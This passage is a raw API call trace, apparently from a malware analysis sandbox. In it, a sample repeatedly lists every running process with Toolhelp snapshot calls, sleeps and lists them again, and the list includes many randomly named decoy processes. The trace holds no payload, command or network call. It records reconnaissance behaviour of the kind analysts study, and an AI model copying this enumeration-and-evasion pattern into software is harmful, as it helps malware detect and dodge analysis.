th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.418] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.419] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.420] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.421] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.422] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.424] CloseHandle (hObject=0xc4) returned 1 [0108.424] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0108.428] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.430] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.430] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.431] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.432] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.432] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.433] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.434] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.434] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.435] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.437] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.438] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.438] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.439] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.440] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.440] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.441] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.443] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.444] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.554] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.555] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.558] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.559] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.562] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.564] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.565] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0108.566] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0108.567] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.568] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.569] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.571] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.572] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0108.574] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.576] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.579] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.580] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.581] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.582] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.583] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0108.593] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0108.594] CloseHandle (hObject=0xbc) returned 1 [0108.594] Sleep (dwMilliseconds=0x12c) [0108.900] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0108.906] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.912] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.914] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.916] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.919] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.921] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.924] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.925] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.927] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.928] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.930] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 